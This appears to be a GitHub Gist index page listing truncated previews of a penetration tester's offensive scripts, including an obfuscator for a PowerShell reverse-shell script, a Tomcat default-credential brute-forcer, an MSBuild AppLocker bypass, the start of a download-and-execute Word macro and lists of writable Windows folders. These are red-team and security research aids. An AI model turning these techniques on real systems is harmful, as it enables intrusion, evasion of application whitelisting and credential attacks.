egre55 egre55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # simple case obfuscator | |
| # author: @egre55 | |
| # usage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1 | |
| if [ "$1" == "" ]; then | |
| printf "\nusage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1\n\n" | |
| exit 0 | |
| fi | |
| file=$1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # author: @egre55 | |
| [CmdletBinding()] | |
| param( | |
| [Parameter(Mandatory=$True)][string]$logfile | |
| ) | |
| $host.UI.RawUI.BufferSize = new-object System.Management.Automation.Host.Size(600,20000) | |
| while($true) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # author: @egre55 | |
| # script to automate the testing of common apache tomcat credentials | |
| #!/usr/bin/env python | |
| import sys | |
| import requests | |
| with open('tomcat-betterdefaultpasslist.txt') as f: | |
| for line in f: |
egre55
/ locations_writable_by_non-admin_users_in_windows.txt
Last active
December 21, 2022 00:34
locations_writable_by_non-admin_users_in_windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## locations writable by non-admin users in Windows (Windows 10) | |
| # default folders | |
| C:\$Recycle.Bin\<USER SID> (whoami /user) | |
| C:\Users\All Users (links to C:\ProgramData) | |
| C:\PerfLogs | |
| C:\ProgramData | |
| C:\Windows\Tasks | |
| C:\Windows\tracing |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |
egre55
/ macro_download_and_execute_msbuild_csproj_powershell.vba
Last active
December 21, 2022 00:34
macro - download and execute applocker bypass (msbuild / csproj / powershell)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' based on | |
| ' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer | |
| ' | |
| ' powashell.csproj by @SubTee | |
| ' https://gist.github.com/egre55/7a6b6018c9c5ae88c63bdb23879df4d0 | |
| Sub Document_Open() | |
| Dim WinHttpReq As Object | |
| Dim oStream As Object | |
| Dim myURL As String |
egre55
/ powershell_binaries_assemblies.txt
Last active
December 21, 2022 00:34
powershell binaries & assemblies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| C:\>dir /B /S powershell.exe /S system.management.automation.dll | |
| C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | |
| C:\Windows\WinSxS\amd64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_968a6a2f18e547eb\powershell.exe | |
| C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_1.0.0.0_none_6340379543bd8a03\System.Management.Automation.dll | |
| C:\Windows\WinSxS\msil_system.management.automation_31bf3856ad364e35_10.0.14393.0_none_f2bad6783ea6eb6a\System.Management.Automation.dll | |
| C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.14393.0_none_a0df14814d4609e6\powershell.exe |
egre55
/ applocker_default_rules_bypass_writable_executable_windows_folders.txt
Last active
December 21, 2022 00:35
applocker_default_rules_bypass_writable_executable_windows_folders.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # writable and executable Windows folders with AppLocker Default Rules in effect | |
| Windows Server 2019 (Version 10.0.17763.914) | |
| C:\Windows\Tasks | |
| C:\Windows\tracing | |
| C:\Windows\Registration\CRMLog | |
| C:\Windows\System32\spool\drivers\color |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Influenced by the Powershell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folder that are both writable | |
| REM and executable under C:\Windows (whitelisted by AppLocker default rules). | |
| REM | |
| REM However, environments implementing application whitelisting may also block powershell.exe. | |
| REM | |
| REM This intends to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\. Replace puttygen.exe as appropriate. Run as a | |
| REM standard (non-admin) user ;D. Bypasses listed in bypasses.txt |
egre55
/ Get-SituationalAwareness.ps1
Last active
December 21, 2022 00:35
Get-SituationalAwareness.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Script will enumerate: | |
| PowerShell Language Mode | |
| Current user details | |
| Current privileges | |
| Domain and Forest functional levels | |
| AD user information | |
| AD computer information |
OlderNewer